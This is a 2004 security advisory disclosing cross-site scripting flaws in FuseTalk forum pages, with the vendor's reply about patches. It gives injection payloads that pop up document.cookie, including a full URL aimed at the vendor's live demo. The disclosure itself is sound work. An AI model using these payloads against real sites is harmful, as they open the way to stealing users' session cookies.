Date: October 12, 2004 Vendor: FuseTalk Issue: Multiple Cross Site Scripting Vulnerabilities URL: http://www.fusetalk.com Advisory: http://www.lovebug.org/fusetalk_advisory.txt Notes: The vendor was contacted last month and responded that: "all of these issues below were fixed in "Security Patches" released 04/21/2004 & 05/04/2004. All customers were notified of these and were to apply them. The site you are visiting obviously has not applied these patches and should. If you do not the person in charge of that site you visit you might want them to email me sales [AT] fusetalk.com and I can let them know where to go and get those patches. However, it appears a large number of sites running FuseTalk are vulnerable and even the Demo Enterprise Edition on their homepage is currently vulnerable. It would appear these patches are not making their way around very well and/or do not fix all the below listed problems. Issue: I am not 100% sure of the version of sites I have found to be vulnerable use or if their vulnerabilities exist in all similar versions of FuseTalk. It might be possible that some level of customization has occurred and spawned the vulnerability. In any case, I will explain the circumstances in which the problem can be recreated as I found it. Finally, the FuseTalk website itself contains a CSS vulnerability in the latest FuseTalk Enterprise Edition demo edition. It would appear Fuse Talk Enterprise Edition 2.0 and other versions are all affected. 1) The data that is sent to searchresults.cfm does not appear to be filtered. Sending it a search string such as <script>alert(document.cookie)</script> will yield a popup with the cookie data. 2) In some forums (often older version) when viewing the profile of users, if scripting code is passed into tombstone.cfm?ProfileID i.e. (tombstone.cfm?ProfileID=<script>alert(document.cookie)</script>) the text is once again unfiltered and the script with be executed 3) One of the major sites I use automatically returns and error page that will not filter and pretty much executes any script sent to any FuseTalk url. I am not sure if this is their own setup or a FuseTalk option. I am under the assumption it is their own 404 issue. However, if there is a setting that brings all invalid pages to a screen that says: "Page Not Found The web page you requested could not be found. Please check to make sure you entered the correct information." then this makes any url that FuseTalk processes vulnerable as well. 4) Lastly: Now in the Enterprise Edition as the demon demo on the website, I have only found one CSS vulnerability thus far. That error lies within usersearchresults.cfm?keyword="SCRIPT". We can recreate the same CSS problems above with the url: http://www.fusetalk.com/forum/usersearchresults.cfm?keyword=<script>alert(document.cookie)</script>&FT_ACTION=SearchUsers Solution: It seems Spiffomatic64 has reported a different CSS problem with FuseTalk earlier today and his suggestions should apply just the same. Credits: Thanks to Virginia Tech for the edumucation I am receiving and to my girlfirend for being so sweet. [SDC] -Steven steven@xxxxxxxxxxx www.lovebug.org/
